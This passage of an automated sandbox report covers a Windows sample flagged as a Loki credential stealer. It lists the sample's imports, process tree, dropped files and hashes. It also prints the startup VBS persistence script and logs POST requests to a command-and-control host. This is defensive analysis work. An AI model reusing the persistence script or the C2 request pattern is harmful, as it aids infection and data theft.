.reloc 0x00099000 0x00009848 0x00009a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.62
.rsrc 0x000a3000 0x000329bc 0x00032a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.95

Imports

Library kernel32.dll:
0x49413c VirtualFree
0x494140 VirtualAlloc
0x494144 LocalFree
0x494148 LocalAlloc
0x49414c GetTickCount
0x494154 GetVersion
0x494158 GetCurrentThreadId
0x494164 VirtualQuery
0x494168 WideCharToMultiByte
0x49416c MultiByteToWideChar
0x494170 lstrlenA
0x494174 lstrcpynA
0x494178 LoadLibraryExA
0x49417c GetThreadLocale
0x494180 GetStartupInfoA
0x494184 GetProcAddress
0x494188 GetModuleHandleA
0x49418c GetModuleFileNameA
0x494190 GetLocaleInfoA
0x494194 GetCommandLineA
0x494198 FreeLibrary
0x49419c FindFirstFileA
0x4941a0 FindClose
0x4941a4 ExitProcess
0x4941a8 WriteFile
0x4941b0 RtlUnwind
0x4941b4 RaiseException
0x4941b8 GetStdHandle
Library user32.dll:
0x4941c0 GetKeyboardType
0x4941c4 LoadStringA
0x4941c8 MessageBoxA
0x4941cc CharNextA
Library advapi32.dll:
0x4941d4 RegQueryValueExA
0x4941d8 RegOpenKeyExA
0x4941dc RegCloseKey
Library oleaut32.dll:
0x4941e4 SysFreeString
0x4941e8 SysReAllocStringLen
0x4941ec SysAllocStringLen
Library kernel32.dll:
0x4941f4 TlsSetValue
0x4941f8 TlsGetValue
0x4941fc LocalAlloc
0x494200 GetModuleHandleA
Library advapi32.dll:
0x494208 RegQueryValueExA
0x49420c RegOpenKeyExA
0x494210 RegCloseKey
Library kernel32.dll:
0x494218 lstrcpyA
0x49421c WriteFile
0x494220 WaitForSingleObject
0x494224 VirtualQuery
0x494228 VirtualAlloc
0x49422c Sleep
0x494230 SizeofResource
0x494234 SetThreadLocale
0x494238 SetFilePointer
0x49423c SetEvent
0x494240 SetErrorMode
0x494244 SetEndOfFile
0x494248 ResetEvent
0x49424c ReadFile
0x494250 MulDiv
0x494254 LockResource
0x494258 LoadResource
0x49425c LoadLibraryA
0x494268 GlobalUnlock
0x49426c GlobalReAlloc
0x494270 GlobalHandle
0x494274 GlobalLock
0x494278 GlobalFree
0x49427c GlobalFindAtomA
0x494280 GlobalDeleteAtom
0x494284 GlobalAlloc
0x494288 GlobalAddAtomA
0x49428c GetVersionExA
0x494290 GetVersion
0x494294 GetTickCount
0x494298 GetThreadLocale
0x49429c GetTempPathA
0x4942a0 GetSystemInfo
0x4942a4 GetStringTypeExA
0x4942a8 GetStdHandle
0x4942ac GetProcAddress
0x4942b0 GetModuleHandleA
0x4942b4 GetModuleFileNameA
0x4942b8 GetLocaleInfoA
0x4942bc GetLocalTime
0x4942c0 GetLastError
0x4942c4 GetFullPathNameA
0x4942c8 GetFileSize
0x4942cc GetFileAttributesA
0x4942d0 GetDiskFreeSpaceA
0x4942d4 GetDateFormatA
0x4942d8 GetCurrentThreadId
0x4942dc GetCurrentProcessId
0x4942e0 GetCPInfo
0x4942e4 GetACP
0x4942e8 FreeResource
0x4942ec InterlockedExchange
0x4942f0 FreeLibrary
0x4942f4 FormatMessageA
0x4942f8 FindResourceA
0x4942fc FindFirstFileA
0x494300 FindClose
0x49430c ExitProcess
0x494310 EnumCalendarInfoA
0x49431c CreateThread
0x494320 CreateFileA
0x494324 CreateEventA
0x494328 CompareStringA
0x49432c CloseHandle
Library version.dll:
0x494334 VerQueryValueA
0x49433c GetFileVersionInfoA
Library gdi32.dll:
0x494344 UnrealizeObject
0x494348 TextOutA
0x49434c StretchBlt
0x494350 SetWindowOrgEx
0x494354 SetWinMetaFileBits
0x494358 SetViewportOrgEx
0x49435c SetTextColor
0x494360 SetTextAlign
0x494364 SetStretchBltMode
0x494368 SetROP2
0x49436c SetPixel
0x494370 SetEnhMetaFileBits
0x494374 SetDIBColorTable
0x494378 SetBrushOrgEx
0x49437c SetBkMode
0x494380 SetBkColor
0x494384 SelectPalette
0x494388 SelectObject
0x49438c SelectClipRgn
0x494390 ScaleWindowExtEx
0x494394 SaveDC
0x494398 RoundRect
0x49439c RestoreDC
0x4943a0 Rectangle
0x4943a4 RectVisible
0x4943a8 RealizePalette
0x4943ac Polyline
0x4943b0 Polygon
0x4943b4 PlayEnhMetaFile
0x4943b8 Pie
0x4943bc PatBlt
0x4943c0 MoveToEx
0x4943c4 MaskBlt
0x4943c8 LineTo
0x4943cc LPtoDP
0x4943d0 IntersectClipRect
0x4943d4 GetWindowOrgEx
0x4943d8 GetWinMetaFileBits
0x4943dc GetTextMetricsA
0x4943e4 GetTextAlign
0x4943ec GetStockObject
0x4943f0 GetPixel
0x4943f4 GetPaletteEntries
0x4943f8 GetObjectA
0x494404 GetEnhMetaFileBits
0x494408 GetDeviceCaps
0x49440c GetDIBits
0x494410 GetDIBColorTable
0x494414 GetDCOrgEx
0x49441c GetClipBox
0x494420 GetBrushOrgEx
0x494424 GetBkMode
0x494428 GetBkColor
0x49442c GetBitmapBits
0x494430 ExtTextOutA
0x494434 ExtSelectClipRgn
0x494438 ExtCreatePen
0x49443c ExcludeClipRect
0x494440 Ellipse
0x494444 DeleteObject
0x494448 DeleteEnhMetaFile
0x49444c DeleteDC
0x494450 CreateSolidBrush
0x494454 CreateRectRgn
0x494458 CreatePolygonRgn
0x49445c CreatePenIndirect
0x494460 CreatePalette
0x494468 CreateFontIndirectA
0x49446c CreateDIBitmap
0x494470 CreateDIBSection
0x494474 CreateCompatibleDC
0x49447c CreateBrushIndirect
0x494480 CreateBitmap
0x494484 CopyEnhMetaFileA
0x494488 BitBlt
0x49448c Arc
Library user32.dll:
0x494494 CreateWindowExA
0x494498 WindowFromPoint
0x49449c WinHelpA
0x4944a0 WaitMessage
0x4944a4 UpdateWindow
0x4944a8 UnregisterClassA
0x4944ac UnhookWindowsHookEx
0x4944b0 TranslateMessage
0x4944b8 TrackPopupMenu
0x4944c0 ShowWindow
0x4944c4 ShowScrollBar
0x4944c8 ShowOwnedPopups
0x4944cc ShowCursor
0x4944d0 SetWindowsHookExA
0x4944d4 SetWindowTextA
0x4944d8 SetWindowPos
0x4944dc SetWindowPlacement
0x4944e0 SetWindowLongA
0x4944e4 SetTimer
0x4944e8 SetScrollRange
0x4944ec SetScrollPos
0x4944f0 SetScrollInfo
0x4944f4 SetRect
0x4944f8 SetPropA
0x4944fc SetParent
0x494500 SetMenuItemInfoA
0x494504 SetMenu
0x494508 SetKeyboardState
0x49450c SetForegroundWindow
0x494510 SetFocus
0x494514 SetCursor
0x494518 SetClipboardData
0x49451c SetClassLongA
0x494520 SetCapture
0x494524 SetActiveWindow
0x494528 SendMessageA
0x49452c ScrollWindow
0x494530 ScreenToClient
0x494534 RemovePropA
0x494538 RemoveMenu
0x49453c ReleaseDC
0x494540 ReleaseCapture
0x49454c RegisterClassA
0x494550 RedrawWindow
0x494554 PtInRect
0x494558 PostQuitMessage
0x49455c PostMessageA
0x494560 PeekMessageA
0x494564 OpenClipboard
0x494568 OffsetRect
0x49456c OemToCharA
0x494570 MessageBoxA
0x494574 MessageBeep
0x494578 MapWindowPoints
0x49457c MapVirtualKeyA
0x494580 LoadStringA
0x494584 LoadKeyboardLayoutA
0x494588 LoadIconA
0x49458c LoadCursorA
0x494590 LoadBitmapA
0x494594 KillTimer
0x494598 IsZoomed
0x49459c IsWindowVisible
0x4945a0 IsWindowEnabled
0x4945a4 IsWindow
0x4945a8 IsRectEmpty
0x4945ac IsIconic
0x4945b0 IsDialogMessageA
0x4945b4 IsChild
0x4945b8 IsCharAlphaNumericA
0x4945bc IsCharAlphaA
0x4945c0 InvalidateRect
0x4945c4 IntersectRect
0x4945c8 InsertMenuItemA
0x4945cc InsertMenuA
0x4945d0 InflateRect
0x4945d8 GetWindowTextA
0x4945dc GetWindowRect
0x4945e0 GetWindowPlacement
0x4945e4 GetWindowLongA
0x4945e8 GetWindowDC
0x4945ec GetTopWindow
0x4945f0 GetSystemMetrics
0x4945f4 GetSystemMenu
0x4945f8 GetSysColorBrush
0x4945fc GetSysColor
0x494600 GetSubMenu
0x494604 GetScrollRange
0x494608 GetScrollPos
0x49460c GetScrollInfo
0x494610 GetPropA
0x494614 GetParent
0x494618 GetWindow
0x49461c GetMenuStringA
0x494620 GetMenuState
0x494624 GetMenuItemInfoA
0x494628 GetMenuItemID
0x49462c GetMenuItemCount
0x494630 GetMenu
0x494634 GetLastActivePopup
0x494638 GetKeyboardState
0x494640 GetKeyboardLayout
0x494644 GetKeyState
0x494648 GetKeyNameTextA
0x49464c GetIconInfo
0x494650 GetForegroundWindow
0x494654 GetFocus
0x494658 GetDlgItem
0x49465c GetDesktopWindow
0x494660 GetDCEx
0x494664 GetDC
0x494668 GetCursorPos
0x49466c GetCursor
0x494670 GetClipboardData
0x494674 GetClientRect
0x494678 GetClassNameA
0x49467c GetClassInfoA
0x494680 GetCapture
0x494684 GetActiveWindow
0x494688 FrameRect
0x49468c FindWindowA
0x494690 FillRect
0x494694 EqualRect
0x494698 EnumWindows
0x49469c EnumThreadWindows
0x4946a4 EndPaint
0x4946a8 EnableWindow
0x4946ac EnableScrollBar
0x4946b0 EnableMenuItem
0x4946b4 EmptyClipboard
0x4946b8 DrawTextA
0x4946bc DrawMenuBar
0x4946c0 DrawIconEx
0x4946c4 DrawIcon
0x4946c8 DrawFrameControl
0x4946cc DrawFocusRect
0x4946d0 DrawEdge
0x4946d4 DispatchMessageA
0x4946d8 DestroyWindow
0x4946dc DestroyMenu
0x4946e0 DestroyIcon
0x4946e4 DestroyCursor
0x4946e8 DeleteMenu
0x4946ec DefWindowProcA
0x4946f0 DefMDIChildProcA
0x4946f4 DefFrameProcA
0x4946f8 CreatePopupMenu
0x4946fc CreateMenu
0x494700 CreateIcon
0x494704 CloseClipboard
0x494708 ClientToScreen
0x49470c CheckMenuItem
0x494710 CallWindowProcA
0x494714 CallNextHookEx
0x494718 BeginPaint
0x49471c CharNextA
0x494720 CharLowerBuffA
0x494724 CharLowerA
0x494728 CharUpperBuffA
0x49472c CharToOemA
0x494730 AdjustWindowRectEx
Library kernel32.dll:
0x49473c Sleep
Library oleaut32.dll:
0x494744 SafeArrayPtrOfIndex
0x494748 SafeArrayGetUBound
0x49474c SafeArrayGetLBound
0x494750 SafeArrayCreate
0x494754 VariantChangeType
0x494758 VariantCopy
0x49475c VariantClear
0x494760 VariantInit
Library comctl32.dll:
0x494770 ImageList_Write
0x494774 ImageList_Read
0x494784 ImageList_DragMove
0x494788 ImageList_DragLeave
0x49478c ImageList_DragEnter
0x494790 ImageList_EndDrag
0x494794 ImageList_BeginDrag
0x494798 ImageList_Remove
0x49479c ImageList_DrawEx
0x4947a0 ImageList_Replace
0x4947a4 ImageList_Draw
0x4947b4 ImageList_Add
0x4947bc ImageList_Destroy
0x4947c0 ImageList_Create
0x4947c4 InitCommonControls
Library comdlg32.dll:
0x4947cc ChooseColorA
0x4947d0 GetSaveFileNameA
0x4947d4 GetOpenFileNameA

This file is not on VirusTotal.

Process Tree

D1B132.exe, PID: 2912, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\D1B132.exe
Command Line: "C:\Users\user\AppData\Local\Temp\D1B132.exe"
stickiy.exe, PID: 2332, Parent PID: 2912
Full Path: C:\Users\user\AppData\Roaming\sticik\stickiy.exe
Command Line: "C:\Users\user\AppData\Roaming\sticik\stickiy.exe"
stickiy.exe, PID: 736, Parent PID: 2332
Full Path: C:\Users\user\AppData\Roaming\sticik\stickiy.exe
Command Line: "C:\Users\user\AppData\Roaming\sticik\stickiy.exe"
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
lsass.exe, PID: 1460, Parent PID: 460
Full Path: C:\Windows\sysnative\lsass.exe
Command Line: C:\Windows\system32\lsass.exe

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 199.192.27.109 [VT] United States

TCP

Source         Source Port  Destination IP  Destination Host  Destination Port
192.168.35.21  49177        199.192.27.109  decvit.ga         80
192.168.35.21  49179        199.192.27.109  decvit.ga         80
192.168.35.21  49182        199.192.27.109  decvit.ga         80
192.168.35.21  49183        199.192.27.109  decvit.ga         80
192.168.35.21  49184        199.192.27.109  decvit.ga         80
192.168.35.21  49185        199.192.27.109  decvit.ga         80
192.168.35.21  49186        199.192.27.109  decvit.ga         80
192.168.35.21  49187        199.192.27.109  decvit.ga         80
192.168.35.21  49188        199.192.27.109  decvit.ga         80
192.168.35.21  49189        199.192.27.109  decvit.ga         80
192.168.35.21  49190        199.192.27.109  decvit.ga         80
192.168.35.21  49191        199.192.27.109  decvit.ga         80
192.168.35.21  49192        199.192.27.109  decvit.ga         80
192.168.35.21  49193        199.192.27.109  decvit.ga         80

UDP

Source         Source Port  Destination  Destination Port
192.168.35.21  58094        8.8.8.8      53

DNS

Name       Response          Post-Analysis Lookup
decvit.ga  A 199.192.27.109

HTTP Requests

URI Data
http://decvit.ga/and/cat.php
POST /and/cat.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: decvit.ga
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 458C3AB2
Content-Length: 206
Connection: close

http://decvit.ga/and/cat.php
POST /and/cat.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: decvit.ga
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 458C3AB2
Content-Length: 179
Connection: close

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Suricata Extracted Files

No dropped Suricata extracted files.

JA3

No JA3 hashes found.

File name stickiy.exe
Associated Filenames
C:\Users\user\AppData\Roaming\sticik\stickiy.exe
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
File Size 853504 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 518281e0a10098565f6a635ec103bfb2
SHA1 3757e2735ec4cedc2dcfc02a93b6e7eaa46c8356
SHA256 b8b6ee5387befd762ecce0e146bd0a6465239fa0785869f05fa58bdd25335d3e
CRC32 42A578A1
Ssdeep 12288:aLNt0GIWI1BrDqqdlb0Z8qL8C0oCH67dOY7XGwJ4UNG3HuYAWEVULNio:ap2u+rw826SdT7XGwJ4UTcEVULUo
ClamAV None
Yara None matched
CAPE Yara None matched
File name stickiy.exe:ZoneIdentifier
Associated Filenames
C:\Users\user\AppData\Roaming\sticik\stickiy.exe:ZoneIdentifier
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
File name sticik.vbs
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
File Size 116 bytes
File Type ASCII text, with CRLF line terminators
MD5 cc14bee3224d46be87a51d05590fe659
SHA1 c3f389a1374e8e3a4df8b70200de9dd0c8abfb97
SHA256 d178b8a3aa30b687a7a880a16abb7b20da30908b82382049c951ce53498fcce8
CRC32 D6041E11
Ssdeep 3:AWEFmRGfGR0U4WPF8HocpkVkEaKC5LGPsMPLACH2:DEFmQulrPF8IOk/aZ5L7ALAf
ClamAV None
Yara None matched
CAPE Yara None matched
Display Text
set ydjyFvJL = CreatEObject("wSCrIPt.ShELl")
yDjyfvjl.Run """C:\Users\user\AppData\Roaming\sticik\stickiy.exe"""
File name 6F2024.lck
Associated Filenames
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
File Size 1 bytes
File Type very short file (no magic)
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
CRC32 83DCEFB7
Ssdeep 3:U:U
ClamAV None
Yara None matched
CAPE Yara None matched
CAPE Files

No CAPE files.

Process Name stickiy.exe
PID 736
Dump Size 647168 bytes
Module Path C:\Users\user\AppData\Roaming\sticik\stickiy.exe
Type PE image: 32-bit executable
MD5 5b66fb1c34287f7b43cc2c5fb2e54e1b
SHA1 1b54ff48d5dfd4748b91b9765cf0ec55c4a78732
SHA256 481235b2eba38cf89373eb111c0c4351464f36ca99e020870af694b76d17f625
CRC32 CD1A41F5
Ssdeep 1536:qzvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/Eq8Izmd:RSHIG6mQwGmfOQd8YhY0/EZUG
ClamAV None
Yara
  • HeavensGate - Heaven's Gate: Switch from 32-bit to 64-mode
CAPE Yara
  • Loki Payload
Dump Filename 481235b2eba38cf89373eb111c0c4351464f36ca99e020870af694b76d17f625

Processing ( 10.191 seconds )

  • 3.507 CAPE
  • 2.614 Static
  • 1.516 TargetInfo
  • 1.504 Dropped
  • 0.35 BehaviorAnalysis
  • 0.275 ProcDump
  • 0.221 Deduplicate
  • 0.107 TrID
  • 0.055 Strings
  • 0.033 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.003 config_decoder
  • 0.001 Debug

Signatures ( 0.247 seconds )

  • 0.021 antivm_vbox_libs
  • 0.018 stealth_timeout
  • 0.015 antiav_detectfile
  • 0.015 antiav_detectreg
  • 0.013 api_spamming
  • 0.012 decoy_document
  • 0.01 infostealer_bitcoin
  • 0.01 infostealer_ftp
  • 0.009 exec_crash
  • 0.008 antiav_avast_libs
  • 0.007 stealth_file
  • 0.006 exploit_getbasekerneladdress
  • 0.006 exploit_gethaldispatchtable
  • 0.006 antivm_vbox_files
  • 0.006 infostealer_im
  • 0.005 antivm_vmware_libs
  • 0.005 antisandbox_sunbelt_libs
  • 0.004 malicious_dynamic_function_loading
  • 0.004 Doppelganging
  • 0.004 antisandbox_sboxie_libs
  • 0.004 dynamic_function_loading
  • 0.004 antiav_bitdefender_libs
  • 0.004 infostealer_mail
  • 0.004 ransomware_files
  • 0.003 persistence_autorun
  • 0.003 antianalysis_detectfile
  • 0.003 antianalysis_detectreg
  • 0.003 ransomware_extensions
  • 0.002 injection_createremotethread
  • 0.002 antisandbox_sleep
  • 0.002 InjectionCreateRemoteThread
  • 0.002 antidbg_devices
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.001 tinba_behavior
  • 0.001 hawkeye_behavior
  • 0.001 network_tor
  • 0.001 InjectionInterProcess
  • 0.001 rat_nanocore
  • 0.001 dridex_behavior
  • 0.001 antivm_generic_services
  • 0.001 betabot_behavior
  • 0.001 kazybot_behavior
  • 0.001 InjectionProcessHollowing
  • 0.001 kibex_behavior
  • 0.001 antivm_generic_scsi
  • 0.001 cerber_behavior
  • 0.001 injection_runpe
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vbox_keys
  • 0.001 antivm_vmware_files
  • 0.001 antivm_vmware_keys
  • 0.001 bot_drive
  • 0.001 codelux_behavior
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway
  • 0.001 rat_pcclient

Reporting ( 0.05 seconds )

  • 0.044 SubmitCAPE
  • 0.006 CompressResults
Task ID 25250
Mongo ID 5c05d988f284886b7cb7847b
Cuckoo release 1.3-CAPE